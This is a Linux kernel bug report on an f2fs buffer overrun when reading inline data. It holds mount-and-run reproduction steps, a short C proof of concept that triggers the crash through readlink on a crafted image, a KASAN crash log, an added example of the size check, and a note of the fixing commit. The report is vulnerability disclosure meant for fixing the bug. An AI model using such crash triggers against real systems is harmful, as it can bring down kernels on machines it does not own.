Bug 200219

Summary: Buffer overrun when reading inline data in f2fs
Product: File System Reporter: Wen Xu (wen.xu)
Component: f2fs    Assignee: Default virtual assignee for f2fs (filesystem_f2fs)
Status: NEW
Severity: normal CC: chao, wen.xu
Priority: P1
Hardware: All
OS: Linux
Kernel Version: 4.18 Subsystem:
Regression: No Bisected commit-id:
Attachments: The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-23 04:39:02 UTC
Created attachment 276757
The (compressed) crafted image which causes crash

- Overview
Buffer overrun when reading inline data in f2fs 

- Reproduce
# mkdir mnt
# mount -t f2fs 59.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <errno.h>
#include <error.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Call readlink() on a symlink inside the mounted crafted image; the
 * inline symlink target is read through f2fs_read_inline_data()
 * (see the call trace below). */
static void activity(char *mpoint) {
  char *sln;
  char buf2[1024];
  ssize_t n;

  if (asprintf(&sln, "%s/foo/bar/sln", mpoint) < 0)
    error(1, errno, "asprintf");

  n = readlink(sln, buf2, sizeof(buf2));
  if (n < 0)
    error(1, errno, "readlink %s", sln);

  free(sln);
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}

- Kernel message
[  548.329372] F2FS-fs (loop0): Can't find valid F2FS filesystem in 2th superblock
[  554.515450] ==================================================================
[  554.516977] BUG: KASAN: out-of-bounds in f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.518397] Read of size 18446744073709513216 at addr ffff8801f42ab50c by task poc/1310
[  554.520066]
[  554.520710]
[  554.521037] The buggy address belongs to the page:
[  554.522002] page:ffffea0007d0aac0 count:1 mapcount:0 mapping:0000000000000000 index:0x0
[  554.523594] flags: 0x2ffff0000000000()
[  554.524362] raw: 02ffff0000000000 dead000000000100 dead000000000200 0000000000000000
[  554.525888] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[  554.527415] page dumped because: kasan: bad access detected
[  554.528535]
[  554.528852] Memory state around the buggy address:
[  554.529820]  ffff8801f42ab400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.531252]  ffff8801f42ab480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.532700] >ffff8801f42ab500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.534126]                       ^
[  554.534832]  ffff8801f42ab580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.536276]  ffff8801f42ab600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.537698] ==================================================================
[  554.539430] BUG: unable to handle kernel paging request at ffff8801eebe9000
[  554.540854] PGD 911ba067 P4D 911ba067 PUD 911c1067 PMD 1f3fb4063 PTE 80000001eebe9061
[  554.542431] Oops: 0003 [#1] SMP KASAN PTI
[  554.543253] CPU: 0 PID: 1310 Comm: poc Tainted: G    B             4.18.0-rc1+ #4
[  554.544746] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.546623] RIP: 0010:__memcpy+0x12/0x20
[  554.547409] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.571413] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.572474] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.573878] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.575283] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.576696] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.578099] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.579515] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.581152] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.582316] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.583750] Call Trace:
[  554.584264]  ? memcpy+0x45/0x50
[  554.584910]  f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.585853]  f2fs_read_inline_data+0x99/0x300
[  554.586745]  f2fs_read_data_page+0xed/0x110
[  554.587609]  do_read_cache_page+0x476/0x780
[  554.588463]  ? f2fs_read_data_pages+0x100/0x100
[  554.589381]  ? trailing_symlink+0x3b0/0x3b0
[  554.590232]  ? pagecache_get_page+0x2f0/0x2f0
[  554.591113]  ? putname+0x80/0x90
[  554.591787]  ? __kasan_slab_free+0x151/0x1a0
[  554.592654]  ? putname+0x80/0x90
[  554.593320]  ? kasan_slab_free+0xe/0x10
[  554.594105]  ? kmem_cache_free+0x89/0x1e0
[  554.594923]  ? putname+0x80/0x90
[  554.595596]  ? filename_lookup+0x191/0x280
[  554.596431]  ? f2fs_read_data_pages+0x100/0x100
[  554.597340]  read_cache_page+0x40/0x50
[  554.598100]  page_get_link+0x5d/0x1b0
[  554.598843]  f2fs_get_link+0x14/0x70
[  554.599578]  vfs_readlink+0x171/0x240
[  554.600322]  ? readlink_copy+0x50/0x50
[  554.601096]  do_readlinkat+0x1e3/0x210
[  554.601861]  ? __x32_compat_sys_newfstat+0x40/0x40
[  554.602833]  ? setxattr+0x260/0x260
[  554.603596]  ? removexattr+0xf0/0xf0
[  554.604329]  __x64_sys_readlink+0x48/0x60
[  554.605146]  do_syscall_64+0x78/0x170
[  554.605897]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  554.606913] RIP: 0033:0x7f4fe4946a37
[  554.607641] Code: 73 01 c3 48 8b 0d 61 b4 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 b8 59 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 31 b4 2c 00 f7 d8 64 89 01 48
[  554.611357] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.612863] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.614268] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.615700] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.617110] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.618514] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.619938] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.629596] CR2: ffff8801eebe9000
[  554.630278] ---[ end trace 4ce02f25ff7d3df5 ]---
[  554.631214] RIP: 0010:__memcpy+0x12/0x20
[  554.632026] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.635762] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.636808] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.638210] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.639626] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.641056] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.642464] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.643885] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.645474] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.646611] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.648461] BUG: unable to handle kernel paging request at 000004b2ffffffff
[  554.649875] PGD 0 P4D 0
[  554.650404] Oops: 0000 [#2] SMP KASAN PTI
[  554.651226] CPU: 0 PID: 1310 Comm: poc Tainted: G    B D           4.18.0-rc1+ #4
[  554.652768] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.654663] RIP: 0010:map_id_up+0x85/0x1f0
[  554.655489] Code: ff ff c7 00 f1 f1 f1 f1 c7 40 04 00 04 f4 f4 c7 40 08 f3 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 45 d0 31 c0 e8 1b 7a 1a 00 <8b> 03 89 85 74 ff ff ff 83 f8 05 0f 87 07 01 00 00 85 c0 0f 84 f8
[  554.667336] RSP: 0018:ffff8801e0ef7bd0 EFLAGS: 00010096
[  554.668390] RAX: 0000000000000000 RBX: 000004b2ffffffff RCX: ffffffffb81f5cb5
[  554.669789] RDX: 0000000000000000 RSI: 0000000000000004 RDI: 000004b2ffffffff
[  554.671191] RBP: ffff8801e0ef7c70 R08: ffffed003c1defb0 R09: ffff8801e0ef7d00
[  554.672602] R10: 0000000000000010 R11: ffffed003c1defaf R12: 0000000000000000
[  554.674016] R13: 0000000000000011 R14: ffff8801f2676040 R15: 1ffff1003c1def7d
[  554.675416] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.677012] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.678151] CR2: 000004b2ffffffff CR3: 000000009000e000 CR4: 00000000000006f0
[  554.679562] Call Trace:
[  554.680074]  ? make_kprojid+0x20/0x20
[  554.680819]  from_kuid_munged+0x28/0x50
[  554.681604]  do_notify_parent+0x1f5/0x4f0
[  554.682417]  ? send_sigqueue+0x390/0x390
[  554.683212]  ? css_set_move_task+0x152/0x340
[  554.684096]  ? will_become_orphaned_pgrp+0x11c/0x160
[  554.685092]  do_exit+0x1290/0x1390
[  554.685786]  ? mm_update_next_owner+0x380/0x380
[  554.686696]  ? setxattr+0x260/0x260
[  554.687406]  ? removexattr+0xf0/0xf0
[  554.688153]  ? __x64_sys_readlink+0x48/0x60
[  554.689007]  rewind_stack_do_exit+0x17/0x20
[  554.689849] RIP: 0033:0x7f4fe4946a37
[  554.690568] Code: Bad RIP value.
[  554.691241] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.692755] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.694190] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.695621] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.697040] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.698445] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.699872] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.709208] CR2: 000004b2ffffffff
[  554.709876] ---[ end trace 4ce02f25ff7d3df6 ]---
[  554.710809] RIP: 0010:__memcpy+0x12/0x20
[  554.711610] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.715325] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.716369] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.717775] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.719182] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.720597] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.722005] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.723407] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.725017] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.726151] CR2: 00007f4fe4946a0d CR3: 000000009000e000 CR4: 00000000000006f0
[  554.727572] Fixing recursive fault but reboot is needed!

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/f2fs/inline.c#L60
	memcpy(dst_addr, src_addr, MAX_INLINE_DATA(inode));
Based on the KASAN report, there is a buffer overrun in this memcpy().

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab, Gatech.
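The following is an added illustration, not code from this report, from the crafted image, or from f2fs itself, of why a byte count derived from on-disk inode fields has to be validated before it reaches memcpy(). The first function keeps the arithmetic shape of a MAX_INLINE_DATA-style macro (sizeof(slot) times a slot count computed from inode fields) and shows that an oversized field wraps to a huge size_t because sizeof() makes the expression unsigned; the second bounds each field first and refuses the inode instead. The constants, the struct fields and the value 10522 are assumptions: 10522 was chosen only so that the unchecked arithmetic wraps to the same byte count the KASAN line above reports, and the report does not say which on-disk field the crafted image actually corrupts.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Layout constants. They follow the shape of the f2fs inode layout
 * (32-bit address slots per inode, one reserved slot before the inline
 * data area) but the values are assumptions for this illustration.
 */
#define ADDRS_PER_INODE        923u  /* 32-bit address slots in an inode  */
#define INLINE_RESERVED_SLOTS  1u    /* slots not usable for inline data  */
#define MAX_XATTR_SLOTS        256u  /* hypothetical cap on inline xattrs */
#define SLOT_BYTES             sizeof(uint32_t)

/* Fields a filesystem reads straight from the on-disk inode, i.e. values
 * an attacker controls when the image is crafted (assumed names). */
struct inode_meta {
    uint16_t extra_isize;        /* bytes of extra attributes in the slot area */
    uint16_t inline_xattr_slots; /* slots consumed by inline xattrs           */
};

/*
 * Unchecked variant: sizeof(slot) * (slots - extra - xattr - reserved).
 * sizeof() is size_t, so a negative slot count silently becomes a huge
 * unsigned byte count instead of an error.
 */
static size_t inline_data_size_unchecked(const struct inode_meta *m)
{
    return SLOT_BYTES * (ADDRS_PER_INODE
                         - m->extra_isize / SLOT_BYTES
                         - m->inline_xattr_slots
                         - INLINE_RESERVED_SLOTS);
}

/*
 * Checked variant: every on-disk field is bounded before it is subtracted,
 * so the result is either a byte count that fits in the inode or a refusal.
 */
static bool inline_data_size_checked(const struct inode_meta *m, size_t *out)
{
    if (m->extra_isize % SLOT_BYTES != 0)
        return false;                        /* not slot aligned              */
    size_t extra_slots = m->extra_isize / SLOT_BYTES;
    if (m->inline_xattr_slots > MAX_XATTR_SLOTS)
        return false;                        /* xattr area larger than allowed */
    size_t used = extra_slots + m->inline_xattr_slots + INLINE_RESERVED_SLOTS;
    if (used >= ADDRS_PER_INODE)
        return false;                        /* nothing left for inline data  */
    *out = SLOT_BYTES * (ADDRS_PER_INODE - used);
    return true;
}

/*
 * Copy inline data into a page-sized buffer. Returns the byte count copied,
 * or -1 when the inode metadata is rejected or the copy would not fit in
 * either buffer; the memcpy() is only reached with a validated length.
 */
static long read_inline_data(const struct inode_meta *m,
                             const uint8_t *src, size_t src_len,
                             uint8_t *dst, size_t dst_len)
{
    size_t n;
    if (!inline_data_size_checked(m, &n))
        return -1;
    if (n > src_len || n > dst_len)
        return -1;
    memcpy(dst, src, n);
    return (long)n;
}

/* Run the guarded copy for one inode against constructed zero-filled
 * buffers (an inode-sized source and a 4 KiB page). */
static long copy_result(const struct inode_meta *m)
{
    static uint8_t disk_inode[ADDRS_PER_INODE * SLOT_BYTES];
    static uint8_t page[4096];
    return read_inline_data(m, disk_inode, sizeof disk_inode, page, sizeof page);
}

int main(void)
{
    /* Constructed samples: a plausible inode and a crafted one. */
    struct inode_meta sane    = { .extra_isize = 0, .inline_xattr_slots = 50 };
    struct inode_meta crafted = { .extra_isize = 0, .inline_xattr_slots = 10522 };

    printf("sane:    unchecked=%zu copied=%ld\n",
           inline_data_size_unchecked(&sane), copy_result(&sane));
    printf("crafted: unchecked=%zu copied=%ld\n",
           inline_data_size_unchecked(&crafted), copy_result(&crafted));
    return 0;
}
```

With the assumed constants the sane inode yields 872 slots, i.e. 3488 bytes, from both variants, while the crafted inode makes the unchecked expression wrap to 18446744073709513216 bytes, the same size the KASAN line reports, and is rejected by the checked path before any copy happens.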
Comment 1 Chao Yu 2019-07-24 02:54:13 UTC
Should have been fixed by the commit below:

042be0f849e5 ("f2fs: fix to do sanity check with current segment number")

To Wen Xu, let me know if you have further questions about this.